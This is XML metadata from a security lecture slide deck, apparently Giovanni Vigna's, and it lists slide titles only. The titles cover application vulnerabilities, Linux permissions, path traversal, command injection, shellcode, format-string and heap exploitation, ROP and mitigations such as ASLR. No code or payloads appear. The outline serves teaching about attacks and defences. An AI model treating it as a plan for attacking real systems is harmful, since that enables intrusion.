      <vt:lpstr>Application Vulnerabilities “Is It Safe?” -- Christian Szell</vt:lpstr>
      <vt:lpstr>Application Security</vt:lpstr>
      <vt:lpstr>Application Model</vt:lpstr>
      <vt:lpstr>Application Vulnerability Analysis</vt:lpstr>
      <vt:lpstr>Design/Logic Vulnerabilities</vt:lpstr>
      <vt:lpstr>Example: The Confused Deputy Problem</vt:lpstr>
      <vt:lpstr>Implementation Vulnerabilities</vt:lpstr>
      <vt:lpstr>Example: Out-of-bounds Read</vt:lpstr>
      <vt:lpstr>Deployment Vulnerabilities</vt:lpstr>
      <vt:lpstr>Example: JIRA Misconfiguration </vt:lpstr>
      <vt:lpstr>Example: Default Credentials</vt:lpstr>
      <vt:lpstr>Remote vs. Local Attacks </vt:lpstr>
      <vt:lpstr>The Linux Access Control System</vt:lpstr>
      <vt:lpstr>Users</vt:lpstr>
      <vt:lpstr>/etc/passwd</vt:lpstr>
      <vt:lpstr>Groups</vt:lpstr>
      <vt:lpstr>/etc/group</vt:lpstr>
      <vt:lpstr>Permission Bits</vt:lpstr>
      <vt:lpstr>Permissions</vt:lpstr>
      <vt:lpstr>Permissions</vt:lpstr>
      <vt:lpstr>Extended Access Control</vt:lpstr>
      <vt:lpstr>Access Control Lists</vt:lpstr>
      <vt:lpstr>UNIX Processes/Threads</vt:lpstr>
      <vt:lpstr>SUID Behavior</vt:lpstr>
      <vt:lpstr>Capabilities</vt:lpstr>
      <vt:lpstr>Seccomp</vt:lpstr>
      <vt:lpstr>Attacking UNIX Applications</vt:lpstr>
      <vt:lpstr>Attack Classes</vt:lpstr>
      <vt:lpstr>Path Traversal Attacks</vt:lpstr>
      <vt:lpstr>Example of Path Traversal Attack</vt:lpstr>
      <vt:lpstr>Example: CVE-2023-3961</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Link Manipulation</vt:lpstr>
      <vt:lpstr>CVE-2024-39578</vt:lpstr>
      <vt:lpstr>Blast from the Past: CVE-1999-0014</vt:lpstr>
      <vt:lpstr>The dtappgather Attack</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Environment Variable Attacks</vt:lpstr>
      <vt:lpstr>Examples of Environment Variables Attacks</vt:lpstr>
      <vt:lpstr>CVE-2024-32019</vt:lpstr>
      <vt:lpstr>CVE-2024-41956</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>TOCTTOU Attacks</vt:lpstr>
      <vt:lpstr>TOCTTOU Example</vt:lpstr>
      <vt:lpstr>Example: CVE-2024-7348</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>A Simple Example</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Other Examples</vt:lpstr>
      <vt:lpstr>Binary Targets</vt:lpstr>
      <vt:lpstr>The ELF File Format</vt:lpstr>
      <vt:lpstr>The ELF File Format</vt:lpstr>
      <vt:lpstr>ELF Sections</vt:lpstr>
      <vt:lpstr>Typical ELF Sections</vt:lpstr>
      <vt:lpstr>The PE File Format</vt:lpstr>
      <vt:lpstr>The x86 CPU Family</vt:lpstr>
      <vt:lpstr>CPU Registers (General Purpose)</vt:lpstr>
      <vt:lpstr>CPU Registers (Pointer Registers)</vt:lpstr>
      <vt:lpstr>CPU Registers (Index Registers)</vt:lpstr>
      <vt:lpstr>CPU Registers (Instruction Pointer)</vt:lpstr>
      <vt:lpstr>CPU Registers (FLAGS)</vt:lpstr>
      <vt:lpstr>CPU Registers (64-bit General Registers)</vt:lpstr>
      <vt:lpstr>CPU Registers (Segments)</vt:lpstr>
      <vt:lpstr>Memory Addressing in x86</vt:lpstr>
      <vt:lpstr>Memory Addressing in x64 </vt:lpstr>
      <vt:lpstr>Beware of the Endianess  (and of Signed Integers)!</vt:lpstr>
      <vt:lpstr>X86/x86_64 Assembly Language</vt:lpstr>
      <vt:lpstr>Data Definition</vt:lpstr>
      <vt:lpstr>Data Sizes</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Sources </vt:lpstr>
      <vt:lpstr>The Stack</vt:lpstr>
      <vt:lpstr>Frames and Function Invocation</vt:lpstr>
      <vt:lpstr>Prologues and Epilogues</vt:lpstr>
      <vt:lpstr>Prologues and Epilogues</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Function Calling Conventions</vt:lpstr>
      <vt:lpstr>Function Calling Conventions</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Invoking System Calls</vt:lpstr>
      <vt:lpstr>Hello World! (32-bit)</vt:lpstr>
      <vt:lpstr>Hello World! (64-bit)</vt:lpstr>
      <vt:lpstr>PLT and GOT</vt:lpstr>
      <vt:lpstr>The .dtors Section</vt:lpstr>
      <vt:lpstr>Program Loading and Execution</vt:lpstr>
      <vt:lpstr>Process Memory Layout</vt:lpstr>
      <vt:lpstr>Process Structure</vt:lpstr>
      <vt:lpstr>Disassembling</vt:lpstr>
      <vt:lpstr>Radare</vt:lpstr>
      <vt:lpstr>IDA Pro</vt:lpstr>
      <vt:lpstr>Ghidra</vt:lpstr>
      <vt:lpstr>angr</vt:lpstr>
      <vt:lpstr>Exploiting Memory Corruption Vulnerabilities </vt:lpstr>
      <vt:lpstr>Overflows/Overwrites</vt:lpstr>
      <vt:lpstr>Overflows/Overwrites</vt:lpstr>
      <vt:lpstr>Stack Overflows</vt:lpstr>
      <vt:lpstr>Stack Overflow</vt:lpstr>
      <vt:lpstr>“Overflowing” Functions </vt:lpstr>
      <vt:lpstr>How to Exploit a Stack Overflow</vt:lpstr>
      <vt:lpstr>The Shellcode</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>The Shellcode</vt:lpstr>
      <vt:lpstr>execve Args</vt:lpstr>
      <vt:lpstr>Invoking the System Calls</vt:lpstr>
      <vt:lpstr>The String Address</vt:lpstr>
      <vt:lpstr>The String Address</vt:lpstr>
      <vt:lpstr>The Shellcode</vt:lpstr>
      <vt:lpstr>Testing the Shellcode</vt:lpstr>
      <vt:lpstr>Fixing the Shellcode</vt:lpstr>
      <vt:lpstr>Testing the Zero-free Shellcode</vt:lpstr>
      <vt:lpstr>Jumping to the Shellcode</vt:lpstr>
      <vt:lpstr>Jumping to the Shellcode</vt:lpstr>
      <vt:lpstr>Guessing the Buffer Address</vt:lpstr>
      <vt:lpstr>NOP Sled</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Creating the “Egg”</vt:lpstr>
      <vt:lpstr>Delivering the “Egg”</vt:lpstr>
      <vt:lpstr>Overflowing Small Buffers</vt:lpstr>
      <vt:lpstr>Creating the “Egg” in the Environment</vt:lpstr>
      <vt:lpstr>Delivering the “Egg” Through the Environment</vt:lpstr>
      <vt:lpstr>Generalizing Memory Corruption</vt:lpstr>
      <vt:lpstr>What Is Overwritten</vt:lpstr>
      <vt:lpstr>What is Overwritten: Long Jumps</vt:lpstr>
      <vt:lpstr>setjmp() and longjmp()</vt:lpstr>
      <vt:lpstr>jmp_buf Implementation</vt:lpstr>
      <vt:lpstr>jmp_buf Implementation</vt:lpstr>
      <vt:lpstr>Designing an Exploit</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>How is Overwritten:  A Carefully (?) Developed Program</vt:lpstr>
      <vt:lpstr>Non-terminated String Overflow</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Index Overflow</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Overflows: Teardrop</vt:lpstr>
      <vt:lpstr>Integer Overflows: Teardrop</vt:lpstr>
      <vt:lpstr>Integer Overflows: Teardrop</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Loop Overflows</vt:lpstr>
      <vt:lpstr>Off-by-one Overflow: Example</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>Overflown Stack Before Returning</vt:lpstr>
      <vt:lpstr>Tracking The Frame Pointer</vt:lpstr>
      <vt:lpstr>Exploiting an Off-by-one Overflow</vt:lpstr>
      <vt:lpstr>Smashing the Frame Pointer</vt:lpstr>
      <vt:lpstr>Finding the Buffer Address</vt:lpstr>
      <vt:lpstr>Determining &amp;&amp;shellcode</vt:lpstr>
      <vt:lpstr>Computing the Overflowing Byte  and &amp;shellcode</vt:lpstr>
      <vt:lpstr>Overflowed Buffer Contents</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>What Happens Next?</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>Lessons Learned </vt:lpstr>
      <vt:lpstr>How is Overwritten: Format String Vulnerabilities</vt:lpstr>
      <vt:lpstr>printf()’s Less-Known Facts</vt:lpstr>
      <vt:lpstr>A Simple Vulnerable Program</vt:lpstr>
      <vt:lpstr>Sample Executions (32-bit)</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>The locale attack (CVE-2000-0844)</vt:lpstr>
      <vt:lpstr>LC_MESSAGE/libc.po</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Where is Overwritten:  DATA and BSS Overflows</vt:lpstr>
      <vt:lpstr>Where is Overwritten: Heap Overflows</vt:lpstr>
      <vt:lpstr>Heap Overflows</vt:lpstr>
      <vt:lpstr>Simple Heap Overflow</vt:lpstr>
      <vt:lpstr>Simple Heap Overflow</vt:lpstr>
      <vt:lpstr>Case Study: Doug Lea’s Malloc</vt:lpstr>
      <vt:lpstr>Memory Layout</vt:lpstr>
      <vt:lpstr>Chunk Management (32-bit)</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Bin Management</vt:lpstr>
      <vt:lpstr>Memory Allocation</vt:lpstr>
      <vt:lpstr>Memory Deallocation</vt:lpstr>
      <vt:lpstr>List Handling: unlink()</vt:lpstr>
      <vt:lpstr>List Handling: frontlink()</vt:lpstr>
      <vt:lpstr>List Handling: frontlink()</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Off-by-one Heap Overwrite</vt:lpstr>
      <vt:lpstr>Off-by-one Heap Overwrite</vt:lpstr>
      <vt:lpstr>Double free() Vulnerabilities</vt:lpstr>
      <vt:lpstr>Overwriting C++ Vtables</vt:lpstr>
      <vt:lpstr>Many Houses of Heap</vt:lpstr>
      <vt:lpstr>Memory Corruption Protections</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>Linux Stack Protection</vt:lpstr>
      <vt:lpstr>DEP and W^X</vt:lpstr>
      <vt:lpstr>Problem with Non-Executable Memory</vt:lpstr>
      <vt:lpstr>Return-into-libc Overflows</vt:lpstr>
      <vt:lpstr>Return-into-libc Overflows </vt:lpstr>
      <vt:lpstr>Executing Multiple Functions</vt:lpstr>
      <vt:lpstr>Executing Arbitrary Sequences of Functions</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>Gadgets</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>StackGuard</vt:lpstr>
      <vt:lpstr>Stack Canaries in Linux</vt:lpstr>
      <vt:lpstr>Bypassing Canaries</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>Address Space Layout Randomization</vt:lpstr>
      <vt:lpstr>ASLR in Linux</vt:lpstr>
      <vt:lpstr>Exploitation under ASLR</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>Control Flow Integrity</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Vigna</dc:creator>
  <cp:lastModifiedBy>Giovanni Vigna</cp:lastModifiedBy>
  <cp:revision>627</cp:revision>
  <cp:lastPrinted>2023-11-02T18:04:48Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-19T17:06:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-21T20:57:31Z</dcterms:modified>
</cp:coreProperties>
</file>